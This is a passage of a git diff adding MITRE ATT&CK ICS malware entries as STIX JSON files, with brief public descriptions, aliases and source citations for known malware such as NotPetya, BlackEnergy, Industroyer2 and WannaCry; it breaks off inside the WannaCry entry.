+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "name": "Conficker",
+ "description": "[Conficker](https://collaborate.mitre.org/attackics/index.php/Software/S0012) is a computer worm that targets Microsoft Windows and was first detected in November 2008. It targets a vulnerability (MS08-067) in Windows OS software and dictionary attacks on administrator passwords to propagate while forming a botnet. Conficker made its way onto computers and removable disk drives in a nuclear power plant. (Citation: Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary)",
+ "type": "malware",
+ "x_mitre_version": "1.0",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "malware--49c04994-1035-4b58-89b7-cf8956e3b423",
+ "created": "2017-05-31T21:32:59.661Z",
+ "modified": "2021-10-21T14:00:00.188Z",
+ "external_references": [
+ {
+ "external_id": "S1003",
+ "source_name": "mitre-ics-attack",
+ "url": "https://collaborate.mitre.org/attackics/index.php/Software/S0012"
+ },
+ {
+ "description": "Catalin Cimpanu. (2016, April 26). Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary. Retrieved October 14, 2019.",
+ "source_name": "Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary",
+ "url": "https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml"
+ },
+ {
+ "description": "Symantec. (2015, June 30). Simple steps to protect yourself from the Conficker Worm. Retrieved December 5, 2019.",
+ "source_name": "Symantec Conficker Jun 2015",
+ "url": "https://support.symantec.com/us/en/article.tech93179.html"
+ }
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_deprecated": true
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--4dcff507-5af8-47ce-964a-8d9569e9ccfe.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--4dcff507-5af8-47ce-964a-8d9569e9ccfe.json
new file mode 100644
index 0000000000000000000000000000000000000000..39095c517aca0b8067320bef9081b6034aaee1e8
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--4dcff507-5af8-47ce-964a-8d9569e9ccfe.json
@@ -0,0 +1,50 @@
+{
+ "type": "bundle",
+ "id": "bundle--9683e341-d9dd-42ee-8e84-8a9db39ad4dd",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2022-10-12T17:59:55.276Z",
+ "name": "PLC-Blaster",
+ "description": "[PLC-Blaster](https://attack.mitre.org/software/S1006) is a piece of proof-of-concept malware that runs on Siemens S7 PLCs. This worm locates other Siemens S7 PLCs on the network and attempts to infect them. Once this worm has infected its target and attempted to infect other devices on the network, the worm can then run one of many modules. (Citation: Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016) (Citation: Spenneberg, Ralf 2016) ",
+ "x_mitre_deprecated": false,
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "PLC-Blaster"
+ ],
+ "type": "malware",
+ "id": "malware--4dcff507-5af8-47ce-964a-8d9569e9ccfe",
+ "created": "2019-03-26T15:02:14.907Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S1006",
+ "external_id": "S1006"
+ },
+ {
+ "source_name": "Spenneberg, Ralf 2016",
+ "description": "Spenneberg, Ralf 2016 PLC-Blaster Retrieved. 2019/06/06 ",
+ "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC.pdf"
+ },
+ {
+ "source_name": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016",
+ "description": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke 2016, March 31 Plc-blaster: A worm living solely in the plc. Retrieved. 2017/09/19 ",
+ "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "labels": [
+ "malware"
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4.json
new file mode 100644
index 0000000000000000000000000000000000000000..aca89721a1cbc0a763ffbcfa7f81bd6580281352
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4.json
@@ -0,0 +1,50 @@
+{
+ "type": "bundle",
+ "id": "bundle--f58b61b1-5240-43de-82e3-4b05cf24fd6b",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2022-10-12T17:33:00.482Z",
+ "name": "BlackEnergy",
+ "description": "[BlackEnergy](https://attack.mitre.org/software/S0089) is a malware toolkit that has been used by both criminal and APT actors. It dates back to at least 2007 and was originally designed to create botnets for use in conducting Distributed Denial of Service (DDoS) attacks, but its use has evolved to support various plug-ins. It is well known for being used during the confrontation between Georgia and Russia in 2008, as well as in targeting Ukrainian institutions. Variants include BlackEnergy 2 and BlackEnergy 3. (Citation: F-Secure BlackEnergy 2014)",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_deprecated": false,
+ "x_mitre_domains": [
+ "enterprise-attack",
+ "ics-attack"
+ ],
+ "x_mitre_version": "1.3",
+ "x_mitre_aliases": [
+ "BlackEnergy",
+ "Black Energy"
+ ],
+ "type": "malware",
+ "id": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4",
+ "created": "2017-05-31T21:32:57.807Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0089",
+ "external_id": "S0089"
+ },
+ {
+ "source_name": "F-Secure BlackEnergy 2014",
+ "description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "labels": [
+ "malware"
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--5719af9d-6b16-46f9-9b28-fb019541ddbb.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--5719af9d-6b16-46f9-9b28-fb019541ddbb.json
new file mode 100644
index 0000000000000000000000000000000000000000..9d4391ebad7d61208b580b76e2758238588d6653
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--5719af9d-6b16-46f9-9b28-fb019541ddbb.json
@@ -0,0 +1,89 @@
+{
+ "type": "bundle",
+ "id": "bundle--338b0e88-c726-4d2f-a965-9c2a20c33495",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-08T22:11:21.842Z",
+ "name": "NotPetya",
+ "description": "[NotPetya](https://attack.mitre.org/software/S0368) is malware that was used by [Sandworm Team](https://attack.mitre.org/groups/G0034) in a worldwide attack starting on June 27, 2017. While [NotPetya](https://attack.mitre.org/software/S0368) appears as a form of ransomware, its main purpose was to destroy data and disk structures on compromised systems; the attackers never intended to make the encrypted data recoverable. As such, [NotPetya](https://attack.mitre.org/software/S0368) may be more appropriately thought of as a form of wiper malware. [NotPetya](https://attack.mitre.org/software/S0368) contains worm-like features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: ESET Telebots June 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_deprecated": false,
+ "x_mitre_domains": [
+ "enterprise-attack",
+ "ics-attack"
+ ],
+ "x_mitre_version": "2.0",
+ "x_mitre_aliases": [
+ "NotPetya",
+ "ExPetr",
+ "Diskcoder.C",
+ "GoldenEye",
+ "Petrwrap",
+ "Nyetya"
+ ],
+ "type": "malware",
+ "id": "malware--5719af9d-6b16-46f9-9b28-fb019541ddbb",
+ "created": "2019-03-26T15:02:14.907Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0368",
+ "external_id": "S0368"
+ },
+ {
+ "source_name": "ExPetr",
+ "description": "(Citation: ESET Telebots June 2017)"
+ },
+ {
+ "source_name": "Diskcoder.C",
+ "description": "(Citation: ESET Telebots June 2017)"
+ },
+ {
+ "source_name": "GoldenEye",
+ "description": "(Citation: Talos Nyetya June 2017)"
+ },
+ {
+ "source_name": "Nyetya",
+ "description": "(Citation: Talos Nyetya June 2017)"
+ },
+ {
+ "source_name": "Petrwrap",
+ "description": "(Citation: Talos Nyetya June 2017)(Citation: ESET Telebots June 2017)"
+ },
+ {
+ "source_name": "ESET Telebots June 2017",
+ "description": "Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020.",
+ "url": "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/"
+ },
+ {
+ "source_name": "Talos Nyetya June 2017",
+ "description": "Chiu, A. (2016, June 27). New Ransomware Variant \"Nyetya\" Compromises Systems Worldwide. Retrieved March 26, 2019.",
+ "url": "https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html"
+ },
+ {
+ "source_name": "US District Court Indictment GRU Unit 74455 October 2020",
+ "description": "Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.",
+ "url": "https://www.justice.gov/opa/press-release/file/1328521/download"
+ },
+ {
+ "source_name": "US-CERT NotPetya 2017",
+ "description": "US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019.",
+ "url": "https://www.us-cert.gov/ncas/alerts/TA17-181A"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "labels": [
+ "malware"
+ ],
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--58eddbaf-7416-419a-ad7b-e65b9d4c3b55.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--58eddbaf-7416-419a-ad7b-e65b9d4c3b55.json
new file mode 100644
index 0000000000000000000000000000000000000000..a317eb44d08a02674ddadba1865661e25b5b6d35
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--58eddbaf-7416-419a-ad7b-e65b9d4c3b55.json
@@ -0,0 +1,64 @@
+{
+ "type": "bundle",
+ "id": "bundle--a341a1ee-4c32-4452-8182-cfecda94645d",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-08T22:15:47.458Z",
+ "name": "Conficker",
+ "description": "[Conficker](https://attack.mitre.org/software/S0608) is a computer worm first detected in October 2008 that targeted Microsoft Windows using the MS08-067 Windows vulnerability to spread.(Citation: SANS Conficker) In 2016, a variant of [Conficker](https://attack.mitre.org/software/S0608) made its way on computers and removable disk drives belonging to a nuclear power plant.(Citation: Conficker Nuclear Power Plant)",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_deprecated": false,
+ "x_mitre_domains": [
+ "enterprise-attack",
+ "ics-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "Conficker",
+ "Kido",
+ "Downadup"
+ ],
+ "type": "malware",
+ "id": "malware--58eddbaf-7416-419a-ad7b-e65b9d4c3b55",
+ "created": "2021-02-23T20:50:32.845Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0608",
+ "external_id": "S0608"
+ },
+ {
+ "source_name": "Kido",
+ "description": "(Citation: SANS Conficker) "
+ },
+ {
+ "source_name": "Downadup",
+ "description": "(Citation: SANS Conficker) "
+ },
+ {
+ "source_name": "SANS Conficker",
+ "description": "Burton, K. (n.d.). The Conficker Worm. Retrieved February 18, 2021.",
+ "url": "https://web.archive.org/web/20200125132645/https://www.sans.org/security-resources/malwarefaq/conficker-worm"
+ },
+ {
+ "source_name": "Conficker Nuclear Power Plant",
+ "description": "Cimpanu, C. (2016, April 26). Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary. Retrieved February 18, 2021.",
+ "url": "https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "labels": [
+ "malware"
+ ],
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--5af7a825-2d9f-400d-931a-e00eb9e27f48.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--5af7a825-2d9f-400d-931a-e00eb9e27f48.json
new file mode 100644
index 0000000000000000000000000000000000000000..b4df20f0ac1ec4592229a35b5995ae4dff143314
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--5af7a825-2d9f-400d-931a-e00eb9e27f48.json
@@ -0,0 +1,57 @@
+{
+ "type": "bundle",
+ "id": "bundle--afe3e47a-ece5-47f9-bc93-12aaead775c3",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-08T22:03:50.370Z",
+ "name": "LockerGoga",
+ "description": "[LockerGoga](https://attack.mitre.org/software/S0372) is ransomware that was first reported in January 2019, and has been tied to various attacks on European companies, including industrial and manufacturing firms.(Citation: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga 2019)",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_deprecated": false,
+ "x_mitre_domains": [
+ "enterprise-attack",
+ "ics-attack"
+ ],
+ "x_mitre_version": "2.0",
+ "x_mitre_contributors": [
+ "Joe Slowik - Dragos"
+ ],
+ "x_mitre_aliases": [
+ "LockerGoga"
+ ],
+ "type": "malware",
+ "id": "malware--5af7a825-2d9f-400d-931a-e00eb9e27f48",
+ "created": "2019-04-16T19:00:49.435Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0372",
+ "external_id": "S0372"
+ },
+ {
+ "source_name": "CarbonBlack LockerGoga 2019",
+ "description": "CarbonBlack Threat Analysis Unit. (2019, March 22). TAU Threat Intelligence Notification \u2013 LockerGoga Ransomware. Retrieved April 16, 2019.",
+ "url": "https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/"
+ },
+ {
+ "source_name": "Unit42 LockerGoga 2019",
+ "description": "Harbison, M. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019.",
+ "url": "https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "labels": [
+ "malware"
+ ],
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--6108f800-10b8-4090-944e-be579f01263d.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--6108f800-10b8-4090-944e-be579f01263d.json
new file mode 100644
index 0000000000000000000000000000000000000000..129e2de5be5a5bf607bca9cb123400a63eb1b34b
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--6108f800-10b8-4090-944e-be579f01263d.json
@@ -0,0 +1,50 @@
+{
+ "type": "bundle",
+ "id": "bundle--5f28f337-c5fb-4d07-b8aa-2a9f3823035f",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2022-10-12T18:30:51.174Z",
+ "name": "VPNFilter",
+ "description": "[VPNFilter](https://attack.mitre.org/software/S1010) is a multi-stage, modular platform with versatile capabilities to support both intelligence-collection and destructive cyber attack operations. [VPNFilter](https://attack.mitre.org/software/S1010) modules such as its packet sniffer ('ps') can collect traffic that passes through an infected device, allowing the theft of website credentials and monitoring of Modbus SCADA protocols. (Citation: William Largent June 2018) (Citation: Carl Hurd March 2019)",
+ "x_mitre_deprecated": false,
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "VPNFilter"
+ ],
+ "type": "malware",
+ "id": "malware--6108f800-10b8-4090-944e-be579f01263d",
+ "created": "2019-03-26T15:02:14.907Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S1010",
+ "external_id": "S1010"
+ },
+ {
+ "source_name": "Carl Hurd March 2019",
+ "description": "Carl Hurd 2019, March 26 VPNFilter Deep Dive Retrieved. 2019/03/28 ",
+ "url": "https://www.youtube.com/watch?v=yuZazP22rpI"
+ },
+ {
+ "source_name": "William Largent June 2018",
+ "description": "William Largent 2018, June 06 VPNFilter Update - VPNFilter exploits endpoints, targets new devices Retrieved. 2019/03/28 ",
+ "url": "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "labels": [
+ "malware"
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--68dca94f-c11d-421e-9287-7c501108e18c.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--68dca94f-c11d-421e-9287-7c501108e18c.json
new file mode 100644
index 0000000000000000000000000000000000000000..decfb5e18f5b4cfc3501dba1d1b53b8be1371721
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--68dca94f-c11d-421e-9287-7c501108e18c.json
@@ -0,0 +1,49 @@
+{
+ "type": "bundle",
+ "id": "bundle--7f12df0a-5102-44aa-8043-a9a8036aec17",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-08T22:17:50.971Z",
+ "name": "Duqu",
+ "description": "[Duqu](https://attack.mitre.org/software/S0038) is a malware platform that uses a modular approach to extend functionality after deployment within a target network. (Citation: Symantec W32.Duqu)",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_deprecated": false,
+ "x_mitre_domains": [
+ "enterprise-attack",
+ "ics-attack"
+ ],
+ "x_mitre_version": "1.2",
+ "x_mitre_aliases": [
+ "Duqu"
+ ],
+ "type": "malware",
+ "id": "malware--68dca94f-c11d-421e-9287-7c501108e18c",
+ "created": "2017-05-31T21:32:31.188Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0038",
+ "external_id": "S0038"
+ },
+ {
+ "source_name": "Symantec W32.Duqu",
+ "description": "Symantec Security Response. (2011, November). W32.Duqu: The precursor to the next Stuxnet. Retrieved September 17, 2015.",
+ "url": "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "labels": [
+ "malware"
+ ],
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5.json
new file mode 100644
index 0000000000000000000000000000000000000000..ce51b508d54517df8ec5e8409c750b981a2ac0d7
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5.json
@@ -0,0 +1,50 @@
+{
+ "type": "bundle",
+ "id": "bundle--41a14769-749e-4703-8500-0722289392e5",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-04-06T22:00:22.774Z",
+ "name": "Industroyer2",
+ "description": "[Industroyer2](https://attack.mitre.org/software/S1072) is a compiled and static piece of malware that has the ability to communicate over the IEC-104 protocol. It is similar to the IEC-104 module found in [Industroyer](https://attack.mitre.org/software/S0604). Security researchers assess that [Industroyer2](https://attack.mitre.org/software/S1072) was designed to cause impact to high-voltage electrical substations. The initial [Industroyer2](https://attack.mitre.org/software/S1072) sample was compiled on 03/23/2022 and scheduled to execute on 04/08/2022, however it was discovered before deploying, resulting in no impact.(Citation: Industroyer2 Blackhat ESET)",
+ "x_mitre_platforms": [
+ "Field Controller/RTU/PLC/IED",
+ "Engineering Workstation"
+ ],
+ "x_mitre_deprecated": false,
+ "x_mitre_domains": [
+ "ics-attack",
+ "enterprise-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "Industroyer2"
+ ],
+ "type": "malware",
+ "id": "malware--6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5",
+ "created": "2023-03-30T19:20:45.556Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S1072",
+ "external_id": "S1072"
+ },
+ {
+ "source_name": "Industroyer2 Blackhat ESET",
+ "description": "Anton Cherepanov, Robert Lipovsky. (2022, August). Industroyer2: Sandworm's Cyberwarfare Targets Ukraine's Power Grid. Retrieved April 6, 2023.",
+ "url": "https://www.youtube.com/watch?v=xC9iM5wVedQ"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "labels": [
+ "malware"
+ ],
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--736a3b71-eccc-48b7-b5ed-adb2b74ca830.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--736a3b71-eccc-48b7-b5ed-adb2b74ca830.json
new file mode 100644
index 0000000000000000000000000000000000000000..d510d0d760ec372b1da14aef4e2714925bb3b40a
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--736a3b71-eccc-48b7-b5ed-adb2b74ca830.json
@@ -0,0 +1,52 @@
+{
+ "type": "bundle",
+ "id": "bundle--bee3a09c-baf6-42ea-bec5-272d73911192",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "labels": [
+ "malware"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_aliases": [
+ "Killdisk"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "name": "Killdisk",
+ "description": "In 2015 the BlackEnergy malware contained a component called KillDisk. KillDisk's main functionality is to overwrite files with random data, rendering the OS unbootable. (Citation: ESET BlackEnergy Jan 2016)",
+ "id": "malware--736a3b71-eccc-48b7-b5ed-adb2b74ca830",
+ "type": "malware",
+ "x_mitre_version": "1.0",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "created": "2017-05-31T21:33:21.973Z",
+ "modified": "2021-10-21T14:00:00.188Z",
+ "external_references": [
+ {
+ "external_id": "S1005",
+ "source_name": "mitre-ics-attack",
+ "url": "https://collaborate.mitre.org/attackics/index.php/Software/S0016"
+ },
+ {
+ "source_name": "ESET BlackEnergy Jan 2016",
+ "description": "Anton Cherepanov. (n.d.). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry. Retrieved October 29, 2019.",
+ "url": "https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/"
+ },
+ {
+ "source_name": "Booz Allen Hamilton",
+ "description": "Booz Allen Hamilton. (n.d.). When The Lights Went Out. Retrieved October 22, 2019.",
+ "url": "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf"
+ }
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_deprecated": true
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--75ecdbf1-c2bb-4afc-a3f9-c8da4de8c661.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--75ecdbf1-c2bb-4afc-a3f9-c8da4de8c661.json
new file mode 100644
index 0000000000000000000000000000000000000000..d0230c5442f371d5f6b35530418e6df1c75a826e
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--75ecdbf1-c2bb-4afc-a3f9-c8da4de8c661.json
@@ -0,0 +1,92 @@
+{
+ "type": "bundle",
+ "id": "bundle--d7eda39f-af96-4ca3-9037-aab5ba71dbd6",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-08T22:20:20.868Z",
+ "name": "WannaCry",
+ "description": "[WannaCry](https://attack.mitre.org/software/S0366) is ransomware that was first seen in a global attack during May 2017, which affected more than 150 countries. It contains worm-like features to spread itself across a computer network using the SMBv1 exploit EternalBlue.(Citation: LogRhythm WannaCry)(Citation: US-CERT WannaCry 2017)(Citation: Washington Post WannaCry 2017)(Citation: FireEye WannaCry 2017)",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_deprecated": false,
+ "x_mitre_domains": [
+ "enterprise-attack",
+ "ics-attack"
+ ],
+ "x_mitre_version": "1.1",
+ "x_mitre_contributors": [
+ "Jan Miller, CrowdStrike"
+ ],
+ "x_mitre_aliases": [
+ "WannaCry",
+ "WanaCry",
+ "WanaCrypt",
+ "WanaCrypt0r",
+ "WCry"
+ ],
+ "type": "malware",
+ "id": "malware--75ecdbf1-c2bb-4afc-a3f9-c8da4de8c661",
+ "created": "2019-03-25T17:30:17.004Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0366",
+ "external_id": "S0366"
+ },
+ {
+ "source_name": "WanaCrypt0r",
+ "description": "(Citation: LogRhythm WannaCry)"
+ },
+ {
+ "source_name": "WCry",
+ "description": "(Citation: LogRhythm WannaCry)(Citation: SecureWorks WannaCry Analysis)"
+ },
+ {
+ "source_name": "WanaCry",
+ "description": "(Citation: SecureWorks WannaCry Analysis)"
+ },
+ {
+ "source_name": "WanaCrypt",
+ "description": "(Citation: SecureWorks WannaCry Analysis)"
+ },
+ {
+ "source_name": "FireEye WannaCry 2017",
+ "description": "Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.",
+ "url": "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html"
+ },
+ {
+ "source_name": "SecureWorks WannaCry Analysis",
+ "description": "Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019.",
+ "url": "https://www.secureworks.com/research/wcry-ransomware-analysis"
+ },
+ {
+ "source_name": "Washington Post WannaCry 2017",
+ "description": "Dwoskin, E. and Adam, K. (2017, May 14). More than 150 countries affected by massive cyberattack, Europol says. Retrieved March 25, 2019.",
